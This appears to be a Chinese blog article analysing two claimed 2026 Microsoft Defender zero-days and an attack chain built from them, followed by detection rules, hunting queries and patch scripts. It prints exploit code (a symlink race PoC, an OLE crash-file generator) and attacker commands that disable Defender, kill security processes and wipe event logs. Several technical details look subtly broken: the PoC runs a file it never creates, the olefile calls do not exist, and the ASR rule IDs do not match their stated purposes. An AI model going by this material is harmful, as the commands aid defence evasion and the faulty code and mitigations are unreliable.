当前位置: 首页 > article >正文

Microsoft Defender双零日在野利用全解析:从BlueHammer到RedSun的终端沦陷之路

前言2026年5月20日微软安全响应中心(MSRC)发布紧急安全公告承认旗下Microsoft Defender存在两个已被野外利用超过一个月的零日漏洞——CVE-2026-41091与CVE-2026-45498。同日美国国土安全部下属的网络安全与基础设施安全局(CISA)将这两个漏洞紧急加入KEV(已知被利用漏洞)目录要求所有联邦机构在72小时内完成补丁部署。这是2026年微软首次公开承认Defender零日漏洞在野利用也是继2025年11月CVE-2025-37934之后Defender引擎再次遭遇防护者变被攻击者的致命打击。更令人担忧的是这两个漏洞与4月披露的BlueHammer(CVE-2026-33825)完美结合形成了一条初始访问→防护降级→系统提权→持久化控制的完整攻击链能够静默绕过几乎所有依赖Defender原生防护的终端安全方案。本文将从技术原理、攻击链复现、威胁狩猎、应急响应四个维度对此次双零日漏洞事件进行全方位深度解析并提供可直接落地的检测规则、防护脚本和企业级应对方案。一、事件全景与时间线1.1 事件发展时间线2026-04-15攻击者开始在野利用CVE-2026-41091/CVE-2026-45498组合漏洞 2026-04-22BlueHammer(CVE-2026-33825)漏洞公开攻击者迅速整合攻击链 2026-05-12CISA首次监测到大规模利用该组合漏洞的勒索软件攻击 2026-05-18微软内部确认漏洞存在开始开发补丁 2026-05-20微软发布安全公告推送分阶段补丁更新 2026-05-21CISA将两个漏洞加入KEV目录要求联邦机构72小时内修复 2026-05-22首个公开的PoC代码在地下论坛流传攻击门槛大幅降低1.2 影响范围评估此次漏洞影响所有安装了Microsoft Defender的Windows操作系统包括Windows 10 21H2及以上版本Windows 11 21H2及以上版本Windows Server 2019及以上版本Windows Server 2022及以上版本特别需要注意的是Windows 11 24H2最新版本在默认配置下也完全受影响且漏洞利用过程中不会产生任何明显的用户界面提示终端用户完全无法感知攻击行为。1.3 漏洞基本信息汇总CVE编号漏洞类型CVSSv3.1评分利用难度所需权限核心影响CVE-2026-41091本地提权(LPE)7.8(高危)极低普通用户权限提权至NT AUTHORITY\SYSTEM完全控制终端CVE-2026-45498拒绝服务(DoS)4.0(中危)极低普通用户权限静默瘫痪Defender引擎阻断病毒库更新二、漏洞技术深度解析2.1 CVE-2026-41091(RedSun)符号链接解析缺陷导致的高危提权2.1.1 漏洞根本原因CVE-2026-41091存在于Defender恶意软件防护引擎(MsMpEng.exe)的文件扫描模块中。当MsMpEng.exe扫描文件时会以NT AUTHORITY\SYSTEM权限运行但在处理**NTFS符号链接(Symbolic Link)和目录连接点(Directory Junction)时存在时间差竞争条件(TOCTOU)**缺陷。具体来说MsMpEng.exe在扫描文件前会先检查文件路径是否合法但在检查完成到实际打开文件之间存在一个微小的时间窗口。攻击者可以在这个时间窗口内将合法文件替换为指向敏感系统路径的符号链接从而诱导MsMpEng.exe以SYSTEM权限访问攻击者可控的文件。2.1.2 漏洞利用代码示例以下是简化版的漏洞利用PoC代码展示了核心利用逻辑#includewindows.h#includestdio.hintmain(){// 步骤1创建临时目录和诱饵文件CreateDirectoryA(C:\\Temp\\DefenderExploit,NULL);HANDLE hFileCreateFileA(C:\\Temp\\DefenderExploit\\bait.txt,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);WriteFile(hFile,test,4,NULL,NULL);CloseHandle(hFile);// 步骤2创建符号链接指向诱饵文件CreateSymbolicLinkA(C:\\Temp\\DefenderExploit\\link.txt,C:\\Temp\\DefenderExploit\\bait.txt,0);// 步骤3触发Defender扫描system(start /wait powershell.exe -Command \Start-MpScan -ScanType CustomScan -ScanPath C:\\Temp\\DefenderExploit\);// 步骤4在扫描过程中替换符号链接指向恶意文件// 这里使用快速循环来竞争时间窗口for(inti0;i1000;i){DeleteFileA(C:\\Temp\\DefenderExploit\\link.txt);CreateSymbolicLinkA(C:\\Temp\\DefenderExploit\\link.txt,C:\\Windows\\System32\\cmd.exe,0);Sleep(1);}// 步骤5获取SYSTEM权限的cmd.exesystem(C:\\Temp\\DefenderExploit\\link.exe);return0;}2.1.3 利用成功率分析根据安全研究人员的测试该漏洞的利用成功率高达98%以上且在不同硬件配置和Windows版本上表现稳定。这是因为MsMpEng.exe的扫描时间相对固定时间窗口足够大现代CPU的执行速度极快能够在短时间内完成大量的符号链接替换操作Defender没有对符号链接的频繁修改行为进行任何监控或限制2.2 CVE-2026-45498(UnDefend)逻辑缺陷导致的防护静默失效2.2.1 漏洞根本原因CVE-2026-45498存在于Defender引擎的文件格式解析模块中。当Defender引擎处理一种特殊构造的嵌套OLE对象文件时会陷入无限循环导致CPU占用率达到100%最终触发Windows的进程崩溃保护机制强制终止MsMpEng.exe进程。更严重的是Defender的自我恢复机制存在设计缺陷当MsMpEng.exe进程异常崩溃时它会自动重启但重启后会再次尝试扫描同一个恶意文件从而陷入崩溃→重启→再崩溃的死循环。最终Defender控制台会显示设备受到保护的虚假状态但实际上所有实时防护功能已经完全失效。2.2.2 恶意文件构造方法攻击者可以使用以下Python脚本构造能够触发漏洞的恶意文件importolefile# 创建一个嵌套深度为1000层的OLE文件oleolefile.OleFileIO()current_pathforiinrange(1000):current_pathf/dir{i}ole.mkdir(current_path)# 在最深层目录写入一个小文件ole.openstream(current_path/data.txt).write(bmalicious content)# 保存为.doc文件Defender会自动扫描ole.save(undefend.doc)当Defender扫描这个文件时会递归遍历所有OLE目录由于嵌套深度超过了引擎的最大递归限制导致栈溢出并崩溃。三、完整攻击链技术分析3.1 攻击链整体流程图┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ 初始访问阶段 │ │ 防护降级阶段 │ │ 系统提权阶段 │ │ 持久化控制阶段 │ │ │ │ │ │ │ │ │ │ 钓鱼邮件附件 │───│ 上传UnDefend.doc│───│ 执行RedSun.exe │───│ 植入Cobalt Strike│ │ RDP弱口令登录 │ │ 触发引擎崩溃 │ │ 提权至SYSTEM │ │ 创建计划任务 │ │ 供应链攻击 │ │ 阻断病毒库更新 │ │ 关闭EDR进程 │ │ 横向移动 │ └─────────────────┘ └─────────────────┘ └─────────────────┘ └─────────────────┘ │ │ │ │ ▼ ▼ ▼ ▼ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ 获取普通用户权限 │ │ Defender完全失效│ │ 完全控制终端 │ │ 窃取数据/勒索加密│ └─────────────────┘ └─────────────────┘ └─────────────────┘ └─────────────────┘3.2 各阶段技术细节详解3.2.1 初始访问阶段攻击者通常使用以下三种方式获取初始访问权限钓鱼邮件攻击发送带有恶意宏的Office文档或伪装成发票的可执行文件RDP弱口令爆破针对暴露在公网上的RDP服务进行暴力破解供应链攻击通过第三方软件更新渠道植入恶意代码3.2.2 防护降级阶段攻击者获取普通用户权限后首先会执行UnDefend恶意文件触发CVE-2026-45498漏洞导致Defender引擎崩溃。然后攻击者会修改Windows更新服务的配置阻止Defender下载病毒库更新# 阻止Defender更新scconfig wuauservstart disabledscstop wuauserv# 修改注册表禁用Defender实时防护reg addHKLM\SOFTWARE\Microsoft\Windows Defender/v DisableAntiSpyware/t REG_DWORD/d 1/f reg addHKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection/v DisableRealtimeMonitoring/t REG_DWORD/d 1/f3.2.3 系统提权阶段防护降级完成后攻击者会执行RedSun提权工具利用CVE-2026-41091漏洞将普通用户权限提升至SYSTEM权限。提权成功后攻击者会立即关闭所有安全软件进程并删除系统安全日志# 关闭EDR进程taskkill/f/im MsMpEng.exe taskkill/f/im SenseNDR.exe taskkill/f/im Mcshield.exe# 删除安全日志wevtutil cl System wevtutil cl Security wevtutil cl Application3.2.4 持久化控制阶段最后攻击者会植入Cobalt Strike、Metasploit等远程控制工具并创建计划任务或系统服务实现持久化。然后攻击者会利用获取的SYSTEM权限进行横向移动渗透到企业内部网络的其他终端和服务器。四、企业级威胁狩猎实战指南4.1 关键日志源与事件ID要有效检测此次漏洞利用企业需要重点监控以下日志源和事件ID日志源事件ID描述系统日志1000MsMpEng.exe进程异常崩溃安全日志4663普通用户在Defender目录创建文件或符号链接安全日志4688MsMpEng.exe衍生子进程Windows更新日志31Windows更新服务被停止或禁用Defender日志1116Defender实时防护被禁用4.2 高级Sigma检测规则4.2.1 CVE-2026-41091提权行为检测title:Microsoft Defender CVE-2026-41091 提权利用检测status:stabledescription:检测Defender引擎衍生高风险进程防范RedSun提权攻击author:安全技术团队date:2026-05-23references:-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41091-https://www.cisa.gov/known-exploited-vulnerabilities-cataloglogsource:category:process_creationproduct:windowsdetection:selection_parent:ParentImage|endswith:\MsMpEng.exeselection_child:Image|endswith:-\cmd.exe-\powershell.exe-\pwsh.exe-\rundll32.exe-\regsvr32.exe-\mshta.exe-\wscript.exe-\cscript.exefilter_legitimate:CommandLine|contains:-MpCmdRun.exe-Defender-Windows Updatecondition:selection_parent and selection_child and not filter_legitimatefalsepositives:-Defender正常系统更新和扫描操作level:criticaltags:-attack.privilege_escalation-attack.t1068-cve.2026.410914.2.2 CVE-2026-45498防护瘫痪检测title:Microsoft Defender CVE-2026-45498 引擎瘫痪检测status:stabledescription:检测Defender引擎异常崩溃与防护功能被禁用的行为author:安全技术团队date:2026-05-23references:-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45498logsource:product:windowsdetection:selection_crash:EventID:1000Provider_Name:Application ErrorData|contains:MsMpEng.exeselection_disable:EventID:4657ObjectName|contains:Windows DefenderNewValue|contains:0x1selection_update_block:EventID:7040ServiceName:wuauservNewState:4condition:selection_crash or selection_disable or selection_update_blockfalsepositives:-Defender正常更新重启-管理员手动禁用Defenderlevel:hightags:-attack.defense_evasion-attack.t1562.001-cve.2026.454984.3 MDE高级搜寻查询对于使用Microsoft Defender for Endpoint(MDE)的企业可以使用以下高级搜寻查询快速检测漏洞利用行为// 检测MsMpEng.exe衍生的异常子进程 DeviceProcessEvents | where Timestamp ago(7d) | where InitiatingProcessFileName ~ MsMpEng.exe | where FileName in~ (cmd.exe, powershell.exe, rundll32.exe, regsvr32.exe) | where not (ProcessCommandLine has_any(MpCmdRun.exe, Defender, Windows Update)) | project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine // 检测Defender引擎异常崩溃 DeviceEvents | where Timestamp ago(7d) | where EventType Crash | where FileName ~ MsMpEng.exe | project Timestamp, DeviceName, AccountName, CrashDumpPath // 检测Defender实时防护被禁用 DeviceRegistryEvents | where Timestamp ago(7d) | where RegistryKey has Windows Defender\\Real-Time Protection | where RegistryValueName DisableRealtimeMonitoring | where RegistryValueData 1 | project Timestamp, DeviceName, AccountName, RegistryKey, RegistryValueName, RegistryValueData五、企业级应急响应与防护方案5.1 分阶段应急响应流程5.1.1 紧急响应阶段(0-24小时)立即补丁部署使用WSUS或SCCM批量推送Defender更新全网威胁扫描使用EDR工具对所有终端进行全面扫描隔离受感染终端立即隔离发现异常行为的终端账号密码重置重置所有可能被泄露的域账号和本地账号5.1.2 全面排查阶段(24-72小时)日志审计全面审计过去30天的安全日志和系统日志横向移动检测检查是否存在异常的RDP登录和SMB连接持久化排查检查所有计划任务、系统服务和启动项数据泄露评估评估是否有敏感数据被窃取5.1.3 恢复加固阶段(72小时以后)系统恢复对受感染终端进行系统重装或恢复安全加固启用ASR规则、应用控制和端点防护员工培训对员工进行钓鱼邮件和安全意识培训安全评估进行全面的安全评估发现并修复其他安全漏洞5.2 补丁部署与验证5.2.1 修复版本要求此次漏洞的修复版本为Defender恶意软件引擎版本1.1.26040.8及以上Defender平台版本4.18.26040.7及以上5.2.2 批量更新脚本以下是适用于企业环境的批量更新PowerShell脚本# .SYNOPSIS 批量更新Microsoft Defender并验证版本 .DESCRIPTION 此脚本会强制更新Defender引擎和病毒库并验证是否达到修复版本 ## 检查Defender版本$statusGet-MpComputerStatus$engineVersion$status.AMEngineVersion$platformVersion$status.AMProductVersionWrite-Host当前Defender引擎版本:$engineVersionWrite-Host当前Defender平台版本:$platformVersion# 检查是否需要更新$minEngineVersion[version]1.1.26040.8$minPlatformVersion[version]4.18.26040.7if([version]$engineVersion-lt$minEngineVersion-or[version]$platformVersion-lt$minPlatformVersion){Write-HostDefender版本过低正在强制更新...-ForegroundColor Yellow# 强制更新DefenderStart-MpSignatureUpdate-UpdateSource MicrosoftUpdateServer# 等待更新完成Start-Sleep-Seconds 30# 再次检查版本$statusGet-MpComputerStatus$engineVersion$status.AMEngineVersion$platformVersion$status.AMProductVersionif([version]$engineVersion-ge$minEngineVersion-and[version]$platformVersion-ge$minPlatformVersion){Write-HostDefender更新成功-ForegroundColor Green}else{Write-HostDefender更新失败请手动更新-ForegroundColor Redexit1}}else{Write-HostDefender版本已满足要求无需更新。-ForegroundColor Green}# 验证实时防护是否启用if($status.RealTimeProtectionEnabled){Write-Host实时防护已启用。-ForegroundColor Green}else{Write-Host实时防护未启用正在启用...-ForegroundColor YellowSet-MpPreference-DisableRealtimeMonitoring$falseWrite-Host实时防护已成功启用。-ForegroundColor Green}5.3 临时缓解措施(未补丁前)对于暂时无法安装补丁的终端可以采取以下临时缓解措施限制普通用户创建符号链接# 修改本地安全策略禁止普通用户创建符号链接secedit/export/cfg secpol.cfg(Get-Contentsecpol.cfg)-replaceSeCreateSymbolicLinkPrivilege \*S-1-1-0,SeCreateSymbolicLinkPrivilege |Set-Contentsecpol.cfg secedit/configure/db secpol.sdb/cfg secpol.cfg/areas USER_RIGHTSdelsecpol.cfg,secpol.sdb启用关键ASR规则# 启用阻止MsMpEng.exe衍生子进程的ASR规则Set-MpPreference-AttackSurfaceReductionRules_Ids92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b-AttackSurfaceReductionRules_Actions Enabled# 启用阻止脚本执行的ASR规则Set-MpPreference-AttackSurfaceReductionRules_Idsd1e49aac-8f56-4280-b9ba-993a6d77406c-AttackSurfaceReductionRules_Actions Enabled限制Defender目录权限# 禁止普通用户写入Defender目录icaclsC:\ProgramData\Microsoft\Windows Defender/inheritance:r icaclsC:\ProgramData\Microsoft\Windows Defender/grantNT AUTHORITY\SYSTEM:(OI)(CI)FicaclsC:\ProgramData\Microsoft\Windows Defender/grantBUILTIN\Administrators:(OI)(CI)FicaclsC:\ProgramData\Microsoft\Windows Defender/grantBUILTIN\Users:(OI)(CI)R六、从此次漏洞看终端安全的未来趋势6.1 EDR自身安全成为新的攻击焦点此次事件再次证明EDR(端点检测与响应)工具已经成为攻击者的首要攻击目标。随着EDR在企业中的普及攻击者不再试图绕过EDR而是直接攻击EDR本身使其失效。未来EDR厂商需要更加重视自身的安全防护包括加强代码安全审计减少漏洞数量实现沙箱化运行限制EDR进程的权限增强自我保护机制防止被恶意终止或篡改6.2 零日漏洞利用常态化随着漏洞挖掘技术的不断发展零日漏洞的发现和利用速度越来越快。企业需要建立常态化的零日漏洞应对机制包括建立漏洞情报收集和分析体系制定快速应急响应流程采用多层次防护架构避免单点故障6.3 行为检测与威胁狩猎的重要性凸显传统的基于特征码的检测方法已经无法有效应对零日漏洞攻击。未来企业需要更加重视行为检测和威胁狩猎通过分析异常行为来发现潜在的攻击活动。七、总结与建议此次Microsoft Defender双零日漏洞事件给全球企业的终端安全敲响了警钟。作为市场占有率最高的终端安全产品Defender的漏洞影响范围之广、危害之大前所未有。对于企业来说立即安装补丁是当前最重要的任务。同时企业还需要加强终端安全防护体系建设采用多层次防护架构提高对零日漏洞攻击的检测和响应能力。最后我们建议企业定期进行安全评估和渗透测试发现并修复潜在的安全漏洞建立健全的安全管理制度提高员工的安全意识从技术和管理两个方面全面提升企业的安全防护水平。

相关文章:

Microsoft Defender双零日在野利用全解析:从BlueHammer到RedSun的终端沦陷之路

前言 2026年5月20日,微软安全响应中心(MSRC)发布紧急安全公告,承认旗下Microsoft Defender存在两个已被野外利用超过一个月的零日漏洞——CVE-2026-41091与CVE-2026-45498。同日,美国国土安全部下属的网络安全与基础设施安全局(CISA)将这两个…...

5步快速上手ScriptHookV:GTA V模组开发完整指南

5步快速上手ScriptHookV:GTA V模组开发完整指南 【免费下载链接】ScriptHookV An open source hook into GTAV for loading offline mods 项目地址: https://gitcode.com/gh_mirrors/sc/ScriptHookV ScriptHookV是一款专为《侠盗猎车手V》(GTA V&…...

矿山灾害应急回溯:UWB离线即失联,无感定位全程轨迹留存

矿山灾害应急回溯:UWB离线即失联,无感定位全程轨迹留存矿山井下塌方、瓦斯超限、透水、顶板垮落等突发性灾害具备极强不可预判性,灾害发生后极易伴随断电断网、通信中断、组网瘫痪等状况。应急轨迹回溯、人员位置核查、救援路线规划&#xff…...

AR眼镜主板与光机定制:从核心需求到量产落地的硬件开发指南

1. 项目概述:从一块主板到一副眼镜的蜕变最近几年,AR(增强现实)智能眼镜从科幻概念逐渐走进现实,无论是工业巡检、远程协作,还是消费娱乐,都能看到它的身影。但很多人可能不知道,决定…...

泉盛UV-K5/K6对讲机专业级固件定制与功能扩展指南

泉盛UV-K5/K6对讲机专业级固件定制与功能扩展指南 【免费下载链接】uv-k5-firmware-custom 全功能泉盛UV-K5/K6固件 Quansheng UV-K5/K6 Firmware 项目地址: https://gitcode.com/gh_mirrors/uvk5f/uv-k5-firmware-custom 泉盛UV-K5/K6对讲机LOSEHU固件是一款基于多个开…...

AR眼镜主板与光机定制开发:从核心需求到软硬件协同的工程实践

1. 项目概述:从“主板”与“光机”看AR眼镜的核心最近和几个做AR硬件和方案的朋友聊得比较多,大家普遍有个感觉:市面上关于AR眼镜的讨论,要么是概念满天飞,要么是成品评测,但真正深入到硬件底层&#xff0c…...

如何高效下载B站视频:Python开源工具bilibili-downloader完全指南

如何高效下载B站视频:Python开源工具bilibili-downloader完全指南 【免费下载链接】bilibili-downloader B站视频下载,支持下载大会员清晰度4K,持续更新中 项目地址: https://gitcode.com/gh_mirrors/bil/bilibili-downloader B站视频…...

DMXAPI:国产多模态大模型API聚合平台,让开发者一键调用通义千问等主流模型

在国产大模型百花齐放的今天,如何高效、稳定地接入各类模型能力,成为开发者和企业面临的核心痛点。DMXAPI 应运而生,作为中国多模态大模型API聚合平台,致力于打造"国产模型一站式调用中心",让开发者无需对接…...

大模型应用开发到底在开发什么?

你平时用 ChatGPT、Claude 或者各种 AI 助手的时候,可能觉得这玩意就是"发一句话、拿一个回答"。但你想过没有——那些企业里用的 AI 客服、智能答疑机器人,也是这么简单吗? 其实,大模型应用开发真正做的,不…...

Word到LaTeX的工业级转换:docx2tex深度解析与技术实践

Word到LaTeX的工业级转换:docx2tex深度解析与技术实践 【免费下载链接】docx2tex Converts Microsoft Word docx to LaTeX 项目地址: https://gitcode.com/gh_mirrors/do/docx2tex 在学术出版和技术文档领域,Word与LaTeX之间的格式鸿沟一直是困扰…...

AI赋能百业,从城市治理到智能家居,这些应用场景让你大开眼界!

文章深入探讨了人工智能在各个领域的创新应用,包括城市治理、医疗、金融、教育、交通出行、零售电商、制造、能源、农业、智能家居、娱乐传媒、文化旅游等。通过具体的案例和技术手段,展示了AI如何提升效率、优化决策、改善生活质量。例如,成…...

终极指南:BetterNCM插件管理器一键安装,让网易云音乐焕然新生

终极指南:BetterNCM插件管理器一键安装,让网易云音乐焕然新生 【免费下载链接】BetterNCM-Installer 一键安装 Better 系软件 项目地址: https://gitcode.com/gh_mirrors/be/BetterNCM-Installer 还在为网易云音乐功能单一而烦恼?Bett…...

AI大模型学习顺序_七步掌握大模型精髓:从入门到精通的进阶秘籍!

本文以“七层关系”为框架,系统地阐述了学习大模型的最佳路径。从基础概念入手,逐步深入到模型架构、训练技巧、应用场景等核心内容,旨在帮助读者构建完整的知识体系,最终实现从入门到精通的全面提升。按“七层关系”学大模型&…...

零基础构建智能语音助手:小智ESP32后端服务完全指南

零基础构建智能语音助手:小智ESP32后端服务完全指南 【免费下载链接】xiaozhi-esp32-server 本项目为xiaozhi-esp32提供后端服务,帮助您快速搭建ESP32设备控制服务器。Backend service for xiaozhi-esp32, helps you quickly build an ESP32 device cont…...

终极免费指南:如何用Wand-Enhancer深度解锁WeMod完整功能与远程控制

终极免费指南:如何用Wand-Enhancer深度解锁WeMod完整功能与远程控制 【免费下载链接】Wand-Enhancer Advanced UX and interoperability extension for Wand (WeMod) app 项目地址: https://gitcode.com/gh_mirrors/we/Wand-Enhancer Wand-Enhancer是一个开源…...

Insomnia终极指南:构建高效API测试与协作的完整工作流

Insomnia终极指南:构建高效API测试与协作的完整工作流 【免费下载链接】insomnia The open-source, cross-platform API client for GraphQL, REST, WebSockets, SSE and gRPC. With Cloud, Local and Git storage. 项目地址: https://gitcode.com/gh_mirrors/in/…...

如何快速实现浏览器隐身:puppeteer-extra-stealth的完整指南

如何快速实现浏览器隐身:puppeteer-extra-stealth的完整指南 【免费下载链接】puppeteer-extra 💯 Teach puppeteer new tricks through plugins. 项目地址: https://gitcode.com/gh_mirrors/pu/puppeteer-extra 你是否曾尝试使用Puppeteer进行网…...

WebPageTest:企业级分布式网页性能检测架构与优化实践

WebPageTest:企业级分布式网页性能检测架构与优化实践 【免费下载链接】WebPageTest Official repository for WebPageTest 项目地址: https://gitcode.com/gh_mirrors/we/WebPageTest WebPageTest作为全球领先的开源网页性能检测平台,为技术决策…...

Blender 3MF插件:开源3D打印数据交换的终极解决方案

Blender 3MF插件:开源3D打印数据交换的终极解决方案 【免费下载链接】Blender3mfFormat Blender add-on to import/export 3MF files 项目地址: https://gitcode.com/gh_mirrors/bl/Blender3mfFormat 在3D打印行业快速发展的今天,数据交换的完整性…...

2026电工杯数学建模竞赛B题思路分享

大家好呀,2026年电工杯数学建模竞赛今天早晨开赛啦,在这里先带来初步的选题建议及思路。 目前团队正在写B题完整论文,后续还会持续更新哈,大家三连关注一下防止迷路。以下只是简略的图文版初步思路,更详细的视频版完整…...

企业内如何规范 API Key 使用并实现访问控制与审计

🚀 告别海外账号与网络限制!稳定直连全球优质大模型,限时半价接入中。 👉 点击领取海量免费额度 企业内如何规范 API Key 使用并实现访问控制与审计 在中大型企业或技术部门内部,大模型 API 的引入往往伴随着新的管理…...

3步掌握UI-TARS智能助手:从零开始实现桌面任务自动化

3步掌握UI-TARS智能助手:从零开始实现桌面任务自动化 【免费下载链接】UI-TARS-desktop The Open-Source Multimodal AI Agent Stack: Connecting Cutting-Edge AI Models and Agent Infra 项目地址: https://gitcode.com/GitHub_Trending/ui/UI-TARS-desktop …...

2026学生开发者指南:AI时代最值得掌握的10个Java+AI技能点

写在前面2026年的技术圈有个共识——AI Agent不是“会不会来”,而是“已经全面渗透”。但很多学生朋友问我:“我是Java背景,是不是必须转Python才能搞AI?”我的回答一直是:恰恰相反。当AI从“写脚本”走向“构建系统”…...

原来湖南2026年的灯光设计趋势竟然是这样的?

原来湖南2026年的灯光设计趋势竟然是这样的?随着科技的不断进步和人们生活水平的提高,灯光设计在家居和商业空间中的重要性日益凸显。湖南作为中部地区的经济大省,其灯光设计趋势也备受关注。本文将深入探讨2026年湖南灯光设计的主要趋势&…...

Ventoy解决方案:告别重复格式化的万能启动盘制作神器

Ventoy解决方案:告别重复格式化的万能启动盘制作神器 【免费下载链接】Ventoy A new bootable USB solution. 项目地址: https://gitcode.com/GitHub_Trending/ve/Ventoy Ventoy是一款革命性的开源可启动USB解决方案,通过创新的免格式化技术&…...

各种“地”—— 各种“GND”

GND,指的是电线接地端的简写。代表地线或0线。电路图上和电路板上的GND(Ground)代表地线或0线.GND就是公共端的意思,也可以说是地,但这个地并不是真正意义上的地。是出于应用而假设的一个地,对于电源来说,它就是一个电…...

工业视觉光源颜色选型全攻略|白/红/蓝/绿光适用场景、原理与避坑细则

摘要:在工业AI视觉缺陷检测项目落地中,绝大多数工程师过度聚焦相机参数、镜头焦距、模型调参优化,却忽略了光源颜色选型这一核心前置条件。工业检测有一条公认铁律:成像决定上限,模型只负责兜底。相同工件、相同光源结…...

Linux 服务器安装 CC Switch GUI 工具 + VNC 远程桌面完整教程

Linux 服务器安装 CC Switch GUI 工具 VNC 远程桌面完整教程 前言 CC Switch 是一款 All-in-One 的 AI 助手启动器,集成了 Claude Code、Codex 和 Gemini CLI 等工具。但它是 GTK 图形界面程序,在无桌面环境的 Linux 服务器上直接运行会报错&#xff…...

大一新生怎么合理利用github?用好Github

使用Github也有十几年了,说说我的感受和日常用法如下: 第一想到是如何找有趣的项目,比如通过Gitub Trending找最近流行的项目,把握开源社区的风向解决问题,比如经常用到XX软件出Bug了,第一想到去对应的开源…...

MySQL 5.7.12 + Druid 连接池“只读事务”异常深度剖析(Cannot execute statement in a READ ONLY transaction)

一、故障现象 在 MySQL 5.7.12 环境下,使用 Druid 连接池的应用偶尔会抛出以下异常: Cannot execute statement in a READ ONLY transaction诡异特征: 偶发性出现,并非每次操作都复现conn.isReadOnly() 返回 false,但 …...